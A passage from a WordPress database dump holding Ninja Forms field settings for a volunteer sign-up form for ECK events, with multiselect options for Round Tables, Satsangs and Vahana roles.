Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Gather Content\";s:5:\"value\";s:14:\"Gather Content\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"Write/Edit Articles\";s:5:\"value\";s:19:\"Write/Edit Articles\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8983,276,'default','','default',''),(7704,268,'key','listmultiselect_234','key','listmultiselect_234'),(7705,268,'container_class',' one-third','container_class',' one-third'),(7706,268,'parent_id','24','parent_id','24'),(7707,269,'objectType','Field','objectType','Field'),(7708,269,'objectDomain','fields','objectDomain','fields'),(7709,269,'editActive','','editActive',''),(7710,269,'order','14','order','14'),(7711,269,'type','listmultiselect','type','listmultiselect'),(7712,269,'label','Round Tables','label','Round Tables'),(7713,269,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7714,269,'label_pos','above','label_pos','above'),(7715,269,'list_type','multi','list_type','multi'),(7716,269,'multi_size','2','multi_size','2'),(7717,269,'list_show_value','1','list_show_value','1'),(7718,269,'list','a:0:{}','list','a:0:{}'),(7719,269,'user_info_field_group','','user_info_field_group',''),(7720,269,'calc_auto_include','0','calc_auto_include','0'),(7721,269,'user_state','0','user_state','0'),(7722,269,'num_sort','0','num_sort','0'),(7723,269,'admin_label','','admin_label',''),(7724,269,'show_help','0','show_help','0'),(7725,269,'help_text','','help_text',''),(7726,269,'show_desc','0','show_desc','0'),(7727,269,'desc_pos','none','desc_pos','none'),(7728,269,'desc_text','','desc_text',''),(7729,269,'element_class','','element_class',''),(7730,269,'required','0','required','0'),(7731,269,'options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Attendee Support\";s:5:\"value\";s:16:\"Attendee Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:18:\"ECK Spiritual Aide\";s:5:\"value\";s:18:\"ECK Spiritual Aide\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Attendee Support\";s:5:\"value\";s:16:\"Attendee Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:18:\"ECK Spiritual Aide\";s:5:\"value\";s:18:\"ECK Spiritual Aide\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8981,276,'field_label','First Name','field_label','First Name'),(8982,276,'field_key','textbox_322','field_key','textbox_322'),(7732,269,'key','listmultiselect_235','key','listmultiselect_235'),(7733,269,'container_class',' one-third','container_class',' one-third'),(7734,269,'parent_id','24','parent_id','24'),(7735,270,'objectType','Field','objectType','Field'),(7736,270,'objectDomain','fields','objectDomain','fields'),(7737,270,'editActive','','editActive',''),(7738,270,'order','11','order','11'),(7739,270,'type','listmultiselect','type','listmultiselect'),(7740,270,'label','Satsangs','label','Satsangs'),(7741,270,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7742,270,'label_pos','above','label_pos','above'),(7743,270,'list_type','multi','list_type','multi'),(7744,270,'multi_size','3','multi_size','3'),(7745,270,'list_show_value','1','list_show_value','1'),(7746,270,'list','a:0:{}','list','a:0:{}'),(7747,270,'user_info_field_group','','user_info_field_group',''),(7748,270,'calc_auto_include','0','calc_auto_include','0'),(7749,270,'user_state','0','user_state','0'),(7750,270,'num_sort','0','num_sort','0'),(7751,270,'admin_label','','admin_label',''),(7752,270,'show_help','0','show_help','0'),(7753,270,'help_text','','help_text',''),(7754,270,'show_desc','0','show_desc','0'),(7755,270,'desc_pos','none','desc_pos','none'),(7756,270,'desc_text','','desc_text',''),(7757,270,'element_class','','element_class',''),(7758,270,'required','0','required','0'),(7759,270,'options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Attendees Support\";s:5:\"value\";s:17:\"Attendees Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:37:\"Trained Arahata With Prior Experience\";s:5:\"value\";s:37:\"Trained Arahata With Prior Experience\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:25:\"Trained Assistant Arahata\";s:5:\"value\";s:25:\"Trained Assistant Arahata\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Attendees Support\";s:5:\"value\";s:17:\"Attendees Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:37:\"Trained Arahata With Prior Experience\";s:5:\"value\";s:37:\"Trained Arahata With Prior Experience\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:25:\"Trained Assistant Arahata\";s:5:\"value\";s:25:\"Trained Assistant Arahata\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8978,275,'container_class','','container_class',''),(8979,275,'drawerDisabled','','drawerDisabled',''),(8980,276,'editActive','','editActive',''),(7760,270,'key','listmultiselect_236','key','listmultiselect_236'),(7761,270,'container_class',' one-third','container_class',' one-third'),(7762,270,'parent_id','24','parent_id','24'),(7763,271,'objectType','Field','objectType','Field'),(7764,271,'objectDomain','fields','objectDomain','fields'),(7765,271,'editActive','','editActive',''),(7766,271,'order','12','order','12'),(7767,271,'type','listmultiselect','type','listmultiselect'),(7768,271,'label','Vahana','label','Vahana'),(7769,271,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7770,271,'label_pos','above','label_pos','above'),(7771,271,'list_type','multi','list_type','multi'),(7772,271,'multi_size','3','multi_size','3'),(7773,271,'list_show_value','1','list_show_value','1'),(7774,271,'list','a:0:{}','list','a:0:{}'),(7775,271,'user_info_field_group','','user_info_field_group',''),(7776,271,'calc_auto_include','0','calc_auto_include','0'),(7777,271,'user_state','0','user_state','0'),(7778,271,'num_sort','0','num_sort','0'),(7779,271,'admin_label','','admin_label',''),(7780,271,'show_help','0','show_help','0'),(7781,271,'help_text','','help_text',''),(7782,271,'show_desc','0','show_desc','0'),(7783,271,'desc_pos','none','desc_pos','none'),(7784,271,'desc_text','','desc_text',''),(7785,271,'element_class','','element_class',''),(7786,271,'required','0','required','0'),(7787,271,'options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"Potluck Help With Food\";s:5:\"value\";s:22:\"Potluck Help With Food\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:11:\"Vahana Desk\";s:5:\"value\";s:11:\"Vahana Desk\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 